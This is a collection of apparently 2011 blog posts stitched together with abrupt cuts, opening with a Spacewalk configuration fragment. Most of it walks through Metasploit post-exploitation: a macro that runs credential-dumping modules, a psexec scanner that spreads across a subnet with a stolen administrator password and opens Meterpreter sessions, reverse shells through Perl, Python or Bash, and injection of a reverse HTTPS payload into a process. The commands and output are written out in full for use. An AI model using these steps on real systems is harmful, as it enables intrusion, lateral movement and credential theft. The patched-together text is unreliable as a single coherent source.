/usr/bin/perl -p -i -e "s/osa_ssl_cert =/osa_ssl_cert = \/usr\/share\/rhn\/RHN-ORG-TRUSTED-SSL-CERT/g" /etc/sysconfig/rhn/osad.conf

We can now set the service:

chkconfig osad on
service osad start

For information on connecting other systems do take a loot at Registering Clients

Caveats

At the moment of this writing in version 1.5 of Spacewalk Errata is only imported from Fedora Channels and not all errata is process. CentOS has not distributed any errata for the version 6.x of CentOS so automating the import of errata is not possible. For previous versions of CentOS the following blog post Blog shows a way to automate the import of the errata information.

msf > use post/multi/manage/multi_post 
msf  post(multi_post) > info

       Name: Multi Manage Post Module Macro Execution
     Module: post/multi/manage/multi_post
    Version: 14287
   Platform: Windows, Unix, OSX, Linux, Solaris
       Arch: 
       Rank: Normal

Provided by:
  carlos_perez <carlos_perez@darkoperator.com>

Description:
  This module will execute a list of modules given in a macro file in 
  the format of < module > < opt=val,opt=val > against the select session 
  checking for compatibility of the module against the sessions and 
  validation of the options provided.


msf  post(multi_post) > show options 

Module options (post/multi/manage/multi_post):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   MACRO                     yes       File with Post Modules and Options to run in the session
   SESSION                   yes       The session to run this module on.

As we can see it takes a macro file where each post module and its options are written one per line in the format of < module > < opt=val,opt=val > lets create a macro for running all password dumping credentials. The Macro would look something like this:

post/windows/gather/credentials/wsftp_client
post/windows/gather/credentials/winscp
post/windows/gather/credentials/windows_autologin
post/windows/gather/credentials/vnc
post/windows/gather/credentials/trillian
post/windows/gather/credentials/total_commander
post/windows/gather/credentials/smartftp
post/windows/gather/credentials/outlook
post/windows/gather/credentials/nimbuzz
post/windows/gather/credentials/mremote
post/windows/gather/credentials/imail
post/windows/gather/credentials/idm
post/windows/gather/credentials/flashfxp
post/windows/gather/credentials/filezilla_server
post/windows/gather/credentials/meebo
post/windows/gather/credentials/coreftp
post/windows/gather/credentials/imvu
post/windows/gather/credentials/epo_sql
post/windows/gather/enum_ie
post/multi/gather/ssh_creds
post/multi/gather/pidgin_cred
post/multi/gather/firefox_creds
post/multi/gather/filezilla_client_cred

Now we save the file as cred_dump.rc and so we can use it in the module:

msf  post(multi_post) > set MACRO /Users/carlos/cred_dump.rc
MACRO => /Users/carlos/cred_dump.rc
msf  post(multi_post) > set SESSION 1
SESSION => 1
msf  post(multi_post) > run

[*] Running module against WIN2K8R2-01
Loading post/windows/gather/credentials/wsftp_client
Running Against 1
[*] Checking Default Locations...
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini not found ....
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP Home\Sites\ws_ftp.ini not found ....
Loading post/windows/gather/credentials/winscp
Running Against 1
[*] Looking for WinSCP.ini file storage...
[*] WinSCP.ini file NOT found...
[*] Looking for Registry Storage...
[*] No WinSCP Registry Keys found!
[*] Done!
Loading post/windows/gather/credentials/windows_autologin
Running Against 1
[*] Running against WIN2K8R2-01 on session 1
[-] Post failed: NameError undefined local variable or method `d02' for #<#<Module:0x007fc88b0c0e78>::Metasploit3:0x007fc88fd80898>
[-] Call stack:
[-]   /Users/carlos/Development/msf4/modules/post/windows/gather/credentials/windows_autologin.rb:95:in `run'
Loading post/windows/gather/credentials/vnc
Running Against 1
[*] Enumerating VNC passwords on WIN2K8R2-01
[*] Checking UltraVNC...
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[*] Checking TightVNC_HKLM_Control_pass...
[*] Checking RealVNC_S-1-5-21-3759490038-1939265364-4245280780-500...
[*] Checking WinVNC4_S-1-5-21-3759490038-1939265364-4245280780-500...
[*] Checking WinVNC_S-1-5-21-3759490038-1939265364-4245280780-500_Default...
[*] Checking WinVNC3_S-1-5-21-3759490038-1939265364-4245280780-500_Default...
[*] Checking WinVNC3_S-1-5-21-3759490038-1939265364-4245280780-500...

. . . . . .

[*] Checking for Firefox directory in: C:\Users\Administrator\AppData\Roaming\Mozilla\
[-] Firefox not found
Loading post/multi/gather/filezilla_client_cred
Running Against 1
[*] Checking for Filezilla directory in: C:\Users\Administrator\AppData\Roaming
[*] No users found with a FileZilla directory
[*] Post module execution completed
msf  post(multi_post) >

As we can see this can be helpful if one wants to create quick macro files to run collections of post modules and use them in automated fashion like with AutoRunScript for when running exploits or setting a multi handler.

As always I hope you find this information useful.

• The module must Scan a range for port 445 TCP and only on those with the port open perform the attack.
• have the ability to set the normal variables of the payload like LHOST and LPORT.
• Provide the ability to specify additional options for the payload, specially for those that have extra advanced options like the Meterpreter HTTPS payload.
• Accept the standard options for the psexec module.

The module i wrote can be found in my GitHub page at psexec_scanner. To use the module you need to do:

mkdir -p ~/.msf4/modules/auxiliary/scanner/smb/
cd ~/.msf4/modules/auxiliary/scanner/smb/
curl -O https://raw.github.com/darkoperator/Meterpreter-Scripts/master/auxiliary/scanner/smb/psexec_scanner.rb

Now we can use the module with any instance of the framework we load in the system making it easier to use across forks of the repository.

Now when we are inside msfconsole we can load the module and look at the options it provides:

msf > use auxiliary/scanner/smb/psexec_scanner 
msf  auxiliary(psexec_scanner) > show options 

Module options (auxiliary/scanner/smb/psexec_scanner):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   HANDLER    true                             no        Start an Exploit Multi Handler to receive the connection
   LHOST                                       yes       Local Hosts for payload to connect.
   LPORT                                       yes       Local Port for payload to connect.
   OPTIONS                                     no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD    windows/meterpreter/reverse_tcp  yes       Payload to use against Windows host
   RHOSTS                                      yes       Range of hosts to scan.
   SHARE      ADMIN$                           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP                        yes       SMB Domain
   SMBPass                                     no        SMB Password
   SMBUser                                     no        SMB Username
   THREADS    1                                yes       The number of concurrent threads
   TYPE       manual                           no        Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual)

As we can see it takes 2 options when it comes to credentials one where we set one single credential to test against several systems or use the credentials found in the database for the current workspace. The credentials in the database will use those stored there in plain text or smb hash format so it will used those found via dumping hashes from target systems and those found thru bruteforcing like the smblogin modules. I did not add the bruteforcing part using a list of user and passwords since the smblogin module is much better suited for this task. Having the module use the options this ways makes it perfect for levering a initial compromise to some systems and expand it to a wider range.

Lets do a sample run against some target systems using a set of credentials I was able to obtain by other means and run it against a range. We start by setting the appropriate options for the payload, set a range to scan, credentials and the number of threads to use:

msf  auxiliary(psexec_scanner) > set LHOST  172.16.163.1
LHOST => 172.16.163.1
msf  auxiliary(psexec_scanner) > set LPORT 4444
LPORT => 4444
msf  auxiliary(psexec_scanner) > set RHOSTS  172.16.163.2-150
RHOSTS => 172.16.163.2-150
msf  auxiliary(psexec_scanner) > set SMBUser Administrator
SMBUser => Administrator
msf  auxiliary(psexec_scanner) > set SMBPass Newsystem01
SMBPass => Newsystem01
msf  auxiliary(psexec_scanner) > set THREADS 10
THREADS => 10

Once we have all set we can launch the scan against the range:

msf  auxiliary(psexec_scanner) > run

[*] Using the username and password provided
#<#<Class:0x007fc88d91aef8>:0x007fc88c53c690>
[*] Starting exploit multi handler
[*] Started reverse handler on 172.16.163.1:4444 
[*] Starting the payload handler...
[*] Scanned 019 of 149 hosts (012% complete)
[*] Scanned 030 of 149 hosts (020% complete)
[*] Scanned 045 of 149 hosts (030% complete)
[*] Scanned 060 of 149 hosts (040% complete)
[*] Scanned 075 of 149 hosts (050% complete)
[*] Scanned 090 of 149 hosts (060% complete)
[*] Scanned 105 of 149 hosts (070% complete)
[*] Scanned 120 of 149 hosts (080% complete)
[*] 172.16.163.141:445 - TCP OPEN
[*] Trying Administrator:Newsystem01
[*] Connecting to the server...
[*] Authenticating to 172.16.163.141:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Scanned 136 of 149 hosts (091% complete)
[*] Created \tMxFrkje.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.163.141[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.163.141[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (PKTFMpHK - "MHLGojYuKIPncRpRNJynImVk")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \tMxFrkje.exe...
[*] Sending stage (752128 bytes) to 172.16.163.141
[*] Meterpreter session 1 opened (172.16.163.1:4444 -> 172.16.163.141:49159) at 2011-12-15 20:23:52 -0400
[*] Scanned 149 of 149 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(psexec_scanner) > sessions -l

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN2K8R2-01  172.16.163.1:4444 -> 172.16.163.141:49159

msf  auxiliary(psexec_scanner) >

A great way to keep leveraging would be to set in the options smart_hashdump and the credential modules as a macro to run against a session in the AutoRunScript option.

Hope you find this blog post useful as always.

• Perl
• Python
• Ruby
• Bash

It will look in this same order for the presence of the interpreter and use it for creating the reverse shell.

For showing how the module works we will use some sessions to systems in my lab where session 1 is for a FreeBSD 8.2 VM, session 3 and session 4 is for a Linux Ubuntu System.

sessions 

Active sessions
===============

  Id  Type                   Information                               Connection
  --  ----                   -----------                               ----------
  1   shell bsd              SSH admin:Newsystem01 (192.168.1.134:22)  192.168.1.241:55187 -> 192.168.1.134:22
  2   meterpreter x86/win32  VICTIMLAB\administrator @ WIN701          192.168.1.100:4444 -> 192.168.1.138:23021
  3   meterpreter x86/win32  VICTIMLAB\Administrator @ WIN2K3LAB01     192.168.1.100:4444 -> 192.168.1.138:4340
  4   shell linux                                                      192.168.1.100:4448 -> 192.168.1.135:37211

Lets start by selecting the module and looking at the options

msf  auxiliary(ssh_login) > use post/multi/manage/system_session 
msf  post(system_session) > show options 

Module options (post/multi/manage/system_session):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  false            yes       Start an Exploit Multi Handler to receive the connection
   LHOST                     yes       IP of host that will receive the connection from the payload.
   LPORT    4433             no        Port for Payload to connect to.
   SESSION                   yes       The session to run this module on.
   TYPE     auto             yes       Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)

Lets start with the case of letting the module select the first supported scripting environment and set a remote session

msf  post(system_session) > set SESSION 1
SESSION => 1
msf  post(system_session) > set LHOST 192.168.1.100
LHOST => 192.168.1.100

msf  post(system_session) > set HANDLER true
HANDLER => true
msf  post(system_session) > run

[*] Starting exploit multi handler
[*] Started reverse handler on 192.168.1.100:4433 
[*] Starting the payload handler...
[*] Python was found on target
[*] Python reverse shell selected
[*] Executing reverse tcp shel to 192.168.1.100 on port 4433
[*] Post module execution completed
msf  post(system_session) > [*] Command shell session 5 opened (192.168.1.100:4433 -> 192.168.1.134:60732) at 2011-10-28 15:03:39 -0400

msf  post(system_session) > sessions 

Active sessions
===============

  Id  Type                   Information                               Connection
  --  ----                   -----------                               ----------
  1   shell bsd              SSH admin:Newsystem01 (192.168.1.134:22)  192.168.1.241:55187 -> 192.168.1.134:22
  2   meterpreter x86/win32  VICTIMLAB\administrator @ WIN701          192.168.1.100:4444 -> 192.168.1.138:23021
  3   meterpreter x86/win32  VICTIMLAB\Administrator @ WIN2K3LAB01     192.168.1.100:4444 -> 192.168.1.138:4340
  4   shell linux                                                      192.168.1.100:4448 -> 192.168.1.135:37211
  5   shell bsd                                                        192.168.1.100:4433 -> 192.168.1.134:60732

msf  post(system_session) >

Now lets try just using the Bash reverse TCP shell using /dev/tcp on one of the Linux systems:

msf  post(system_session) > set SESSION 4
SESSION => 4
msf  post(system_session) > set TYPE bash 
TYPE => bash
msf  post(system_session) > run

[*] Starting exploit multi handler
[-] Job 5 is listening on IP 192.168.1.100 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Bash reverse shell selected
[*] Executing reverse tcp shel to 192.168.1.100 on port 4433
[*] Post module execution completed
msf  post(system_session) > [*] Command shell session 6 opened (192.168.1.100:4433 -> 192.168.1.135:45662) at 2011-10-28 15:08:13 -0400

msf  post(system_session) > sessions -i 6
[*] Starting interaction with 6...

bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

carlos@infidel02-dev:/home/carlos/Desktop$ uname -a
uname -a
Linux infidel02-dev 2.6.32-25-generic #45-Ubuntu SMP Sat Oct 16 19:48:22 UTC 2010 i686 GNU/Linux
carlos@infidel02-dev:/home/carlos/Desktop$ ^Z
Background session 6? [y/N]  y

As we can see this can become quite useful when the shell we have is one on a Unix type system where the framework still does not support injecting in to processes payloads and where writing a file to disk is not necessarily the best option in that case.

As alway I hope you find this information useful.

• Injecting a Windows Payload in to 32bit and 64bit Processes.
• Check that both the payload and the process are of the same architecture.
• Start a temporary process with the appropriate architecture.
• Be able to provide a flexible option list since different payloads have different options.

So payload_inject was born in a flight from Kentucky to Puerto Rico.

Lets start by looking at the module and it's options from inside a Meterpreter session:

msf  post(persistence) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > info post/windows/manage/payload_inject 

       Name: Windows Manage Memory Payload Injection Module
     Module: post/windows/manage/payload_inject
    Version: 14039
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Carlos Perez <carlos_perez@darkoperator.com>

Description:
  This module will inject into the memory of a process a specified 
  windows payload. If a payload or process is not provided one will be 
  created by default using a reverse x86 TCP Meterpreter Payload.




Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST                                     yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.   
   SESSION                                   yes       The session to run this module on.

Now that we see that are the options available lets load a reverse HTTPS session in a persistent way in memory as our secondary shell:

meterpreter > run post/windows/manage/payload_inject PAYLOAD=windows/meterpreter/reverse_https,LHOST=192.168.1.100,LPORT=3334,HANDLER=true,OPTIONS='SessionCommunicationTimeout=0,SessionExpirationTimeout=0,PID=3384'

[*] Running module against WIN701
[*] Starting exploit multi handler
[*] Performing Architecture Check
[*] Started HTTPS reverse handler on https://192.168.1.100:3334/
[*] Starting the payload handler...
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 3384
[*] Opening process 3384
[*] Generating payload
[*] Allocating memory in process 3384
[*] Allocated memory at address 0x006e0000, for 369 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 3384
meterpreter > 
[*] 192.168.1.138:37854 Request received for /INITM...
[*] 192.168.1.138:37854 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 7 opened (192.168.1.100:3334 -> 192.168.1.138:37854) at 2011-10-28 17:47:46 -0400

One of the things I like about the HTTPS sessions is that I can detach from one and reconnect later to it by just bringing up a listener:

meterpreter > background 
msf  post(persistence) > sessions -i 7
[*] Starting interaction with 7...

meterpreter > detach 

[*] Meterpreter session 7 closed.  Reason: User exit
msf  post(persistence) > 
[*] 192.168.1.138:48859 Request received for /CONN_bPXZiVo1IOWy8xFv/...
[*] Incoming orphaned session CONN_bPXZiVo1IOWy8xFv, reattaching...
[*] Meterpreter session 7 opened (192.168.1.100:3334 -> 192.168.1.138:48859) at 2011-10-28 17:55:12 -0400

We can do the same with any Windows compatible payload. I hope you find the module useful.

The main areas I have coded so far in my free time have been:

• Project - For managing of projects inside workspaces for saving data and exporting data from different tables from the Metasploit database.

• Post Automation - To automate post exploitation tasks.

• Discovery - For performing network discovery of hosts and services. (Will add discovery thru pivot in the future.)

The plugin can be found in my Github account https://github.com/darkoperator/Metasploit-Plugins/blob/master/pentest.rb as time passes I will keep adding new features to it as I need them and as friends coerce me in to adding new stuff for them.

Best way to add the plugin to your framework copy is to save it in your metasploit setting folder in your home directory:

mkdir -p ~/.msf4/plugins
cd ~/.msf4/plugins
curl -O https://raw.github.com/darkoperator/Metasploit-Plugins/master/ pentest.rb

Once it is downloaded there any instance of the framework you start will have access to it. To load it is is as simple as using the load command and using the help or ? command to see the additional commands that where added by the plugin:

msf  exploit(handler) > load pentest 
postauto plugin loaded.
[*] Successfully loaded plugin: pentest
msf  exploit(handler) > ?

Discovery Commands
==================

    Command           Description
    -------           -----------
    network_discover  Performs a portscan and enumeration of services found for non pivot networks.


Project Commands
================

    Command       Description
    -------       -----------
    project       Command for managing projects.


Postauto Commands
=================

    Command             Description
    -------             -----------
    app_creds           Run application password collection modules against specified sessions.
    multi_cmd           Run shell command against several sessions
    multi_meter_cmd     Run a Meterpreter Console Command against specified sessions.
    multi_meter_cmd_rc  Run resource file with Meterpreter Console Commands against specified sessions.
    multi_post          Run a post module against specified sessions.
    multi_post_rc       Run resource file with post modules and options against specified sessions.
    sys_creds           Run system password collection modules against specified sessions.

Projects

Many times I find my self experimenting with different datasets as I develop scripts, resource files, modules ..etc and other times I have data of personal clients, I tended to create workspaces inside the framework for this and run several commands and resource scripts to set capture and exporting of data per project, so I added this command to help me manage all of that:

msf  exploit(handler) > project -h

OPTIONS:

    -a         Export all history and DB and archive it in to a zip file for current project.
    -c         Create a new Metasploit project and sets logging for it.
    -d         Delete a project created by the plugin.
    -h         Command Help
    -l         List projects created by plugin.
    -p  <opt>  Path to save archive, if none provide default ~/.msf4/archives will be used.
    -ph        Generate resource files for sessions and console. Generate time stamped session logs for current project.
    -r         Create time stamped RC files of Meterpreter Sessions and console history for current project.
    -s         Switch to a project created by the plugin.

Creating a new project

To create a new project is as simple as:

msf  exploit(handler) > project -c pauldotcom
Creating DB Workspace named pauldotcom
Added workspace: pauldotcom
Spooling to file /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_spool.log...
msf  exploit(handler) >  > project -l
List of projects:
    * pauldotcom
msf  exploit(handler) >  >

As you can see the command created the workspace called pauldotcom and started logging using spool to *~/.msf4/logs/projects/* one can use the -l switch to list them. You might see a extra “>” added when you manipulate projects, this is do to a bug with the spool command that has been open for a while, hope it gets fixed soon.

One of the features I like the most is the ability to create a time stamped resource file that will show all the command I have entered in a session and show the command ran, this can prove quite useful when showing a client what actions where taken and when. Here is an example if I only want to show the commands ran in the console, if we had some meterpreter sessions it would had generated timestamped resource files for those also:

msf  exploit(handler) >  > project -r 
Writing Console RC file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3913.rc
RC file written
List of projects:
    * pauldotcom
msf  exploit(handler) >  > cat /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3913.rc
[*] exec: cat /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3913.rc

# command executed at 2011-12-15 14:06:52 UTC
project -l
# command executed at 2011-12-15 14:38:13 UTC
project -r

If we want a full project history that covers:

• Timestamped session Commands resource file
• Timestamped Meterpreter session log of commands and output
• Timestamped console commands resource file

Then the -ph would have been used:

msf  exploit(handler) >  > project -ph
Writing Console RC file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.0735.rc
RC file written
Creating RC file for Session 1
Saving RC file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.rc
RC file written
Exporting Session 1 history
Saving log file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.log
Log file written
msf  exploit(handler) >  > cat /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.log
[*] exec: cat /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.log

# Info: uuid: 8chmctur type: meterpreter id: 1 info:  
2011-12-15 15:02:57 UTC
load stdapi
2011-12-15 15:03:00 UTC
load priv
2011-12-15 15:04:24 UTC
run checkvm
2011-12-15 15:04:36 UTC
run post/windows/gather/win_privs
2011-12-15 15:04:56 UTC
run priv
2011-12-15 15:05:08 UTC
background
2011-12-15 15:07:20 UTC
ls
2011-12-15 15:07:21 UTC

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  37888  fil   2010-01-25 18:49:24 -0400  macmet.exe
40777/rwxrwxrwx   0      dir   2010-01-17 08:59:54 -0400  ..
40777/rwxrwxrwx   0      dir   2010-02-20 14:48:26 -0400  .


2011-12-15 15:07:25 UTC
getuid
2011-12-15 15:07:25 UTC
Server username: TESTACCN-X6V582\Administrator
2011-12-15 15:07:28 UTC
sysinfo
2011-12-15 15:07:28 UTC
Computer        : TESTACCN-X6V582
2011-12-15 15:07:28 UTC
OS              : Windows XP (Build 2600).
2011-12-15 15:07:28 UTC
Architecture    : x86
2011-12-15 15:07:28 UTC
System Language : en_US
2011-12-15 15:07:28 UTC
Meterpreter     : x86/win32
2011-12-15 15:07:30 UTC
background

Lets say we finished with a project and are going to share the info with the project manager, other team member or client one can create a single zip file:

• Spool file of the project
• Resource files for console and session commands
• Session history
• Exported database in xml format

To do this we use the -a command for archiving:

msf  exploit(handler) >  > project -a
Exporting DB Workspace pauldotcom
    >> Starting export of report
    >> Starting export of hosts
    >> Starting export of events
    >> Starting export of services
    >> Starting export of credentials
    >> Starting export of web sites
    >> Starting export of web pages
    >> Starting export of web forms
    >> Starting export of web vulns
    >> Finished export of report
Finished export of workspace pauldotcom to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.1942.xml [ xml ]...
Disabling spooling for pauldotcom
Spooling disabled for archiving
Writing Console RC file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.1942.rc
RC file written
Creating RC file for Session 1
Saving RC file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.1942.rc
RC file written
Exporting Session 1 history
Saving log file to /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.1942.log
Log file written
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.0514.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.0735.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.1942.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.1942.xml to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3813.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3833.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3840.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_20111215.3913.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0514.log to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0514.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.log to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.0735.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.1942.log to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_session_1_20111215.1942.rc to archive
Adding /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_spool.log to archive
All files saved to /Users/carlos/.msf4/logs/archives/pauldotcom_20111215.1942.zip
MD5 for archive is 97638701e10d9ca8a4f7684bfc1f5d73
Spooling re-enabled
Spooling to file /Users/carlos/.msf4/logs/projects/pauldotcom/pauldotcom_spool.log...
msf  exploit(handler) >  >  >

 Now this does changes my workflow for the code I write for use in Metasploit. I do have a GitHub account that I used as my temporary account for plugins and modules, I will be consolidating this one in to one single project in GitHub and making sure it follows the folder structure as in the framework so I can just have it in my machine under ~/.msf4 that way I can test modify and test modules and plugins without the need of putting them in the framework folder it self and move them in to the forked version if I wish to contribute them to Rapid7 if not they will still be accessible for sharing under my GitHub page. So there are now 2 new ways to use the framework repository depending on your need, If you are only to consume the code in it and do not wish to contribute your code to Rapid7 you just need to have Git on your system and clone the repository. You first start by installing Git

Installing Git

On OS X you only need to install the latest Xcode Tools from the AppStore On CentOS 6 and latest Fedora Systems you would run as root

yum update
yum install git

On Ubuntu and Debian systems you would run as root

apt-get update
apt-get install git-core

 Cloning the Repository

I’m a person who likes having several copies of the Framework to work in, I tend to keep in my home folder on my boxes a folder call dev where I keep all the project repositories I use. So I recommend you start by creating the folder to host the project and its copies if you later decide to fork and work on coding inside the Framework.

mkdir -p ~/dev
cd ~/dev

 Once the folder is create you only need to clone the Git repository that is on GitHub

git clone git://github.com/rapid7/metasploit-framework.git

Now you should be able to use and work from inside the metasploit-framework folder created there. To keep you copy updated you only need to run from the folder 

git pull

This will fetch the latest changes and merge them together. 

Forking the Project

If you are planning on contributing to the project then it is recommended that you fork the project so you can issue pull request from GitHub. To be able to do this you must first have a GitHub account at http://github.com once you have an account there you can navigate to https://github.com/rapid7/metasploit-framework and from there click on the fork button on the page to create a fork under your account

Once it has been forked you can now clone it your development system by running the following command in your dev folder, In the example bellow you will see I amed it msf-fork so I can quickly see this is my forked copy 

git clone git@github.com:<your username>/metasploit-framework.git msf-fork

Next I want to be able to update from the main Framework repository so I will set the one managed by Rapid7 as upstream and test updating

git remote add upstream git://github.com/rapid7/metasploit-framework.git
git fetch upstream

 Once you have done several commits to the clone in your machine you can push those to the fork on your GitHub account by doing running the following command

git push origin master

Any time the framework is updated and you want to merge those changes in to your forked copy you would run 

git fetch upstream
git merge upstream/master

 To send a pull request to Rapid7 so as to contribute your code or changes you would follow the GitHub guide that would do a better job than me explaining it in this blog post

http://help.github.com/send-pull-requests/

I also recommend the use of branches so you can have several branches of the fork you have so you can later merge those in to your local clone of the fork and push for latter submitting for pull requests a great guide for this is on Online Git Book http://book.git-scm.com/3_basic_branching_and_merging.html

I hope you find this post useful and look forward to people contributing to the Framework.

• OS Type and Name
• Host Name
• Domain/Workgroup

Now one of the things I noticed was that Domain and Workgroups where all tagged as domain. The information is saved with the service in the info field of the service, so what I did was parse that string for the machine name and workgroup name and placed those in variables so I can work with those for each service, check that it is not the same as the computer name or the 2 most common workgroup names out there that are MSHOME and WORKGROUP and show the output.

  1: <ruby>
  2: framework.db.workspace.services.find_all_by_state("open").each do |s|
  3:   if s.port == 445 and s.info =~ /windows/i
  4:     name = s.info.scan(/name:(\S*)\)/)[0].join
  5:     domain = s.info.scan(/domain:(\S*)\)/)[0].join
  6:     if ( domain !~ /WORKGROUP|MSHOME/) and (domain != name)
  7:       print_good("Name: #{name} Address: #{s.host.address} Domain: #{domain}")
  8:       print_good("Info: #{s.info}\n")
  9:     end
 10:   end
 11: end
 12: </ruby>

To do all of this I used the the resource file you see above. I first looked at the services saved in my current workspace and looked for all of those with a state of “open” and iterated thru each as seen in line 2 of the code. For each found service with the state of open I checked for the open port of 445 the SMB port and where the smb_version module saves it’s information and checked with a regular expression that the work windows was part of the information. For each one of the services that matched that criteria I extracted the name and domain using regular expressions as seen in lines 4 and 5 and saved those so I could compare then. On line 6 of the code I check that the workgroup does not matches the 2 common ones I mentioned and that the Domain Name is not the same as the computer as it happens on some versions of Windows XP, specially the home edition and print the information.

This is a quick and dirty way to enumerate possible domain names and the hosts in it to perform more specific windows attacks. Hope you found this little excerpt of code useful and servers as an example of how one is able to play with the information inside the database of Metasploit.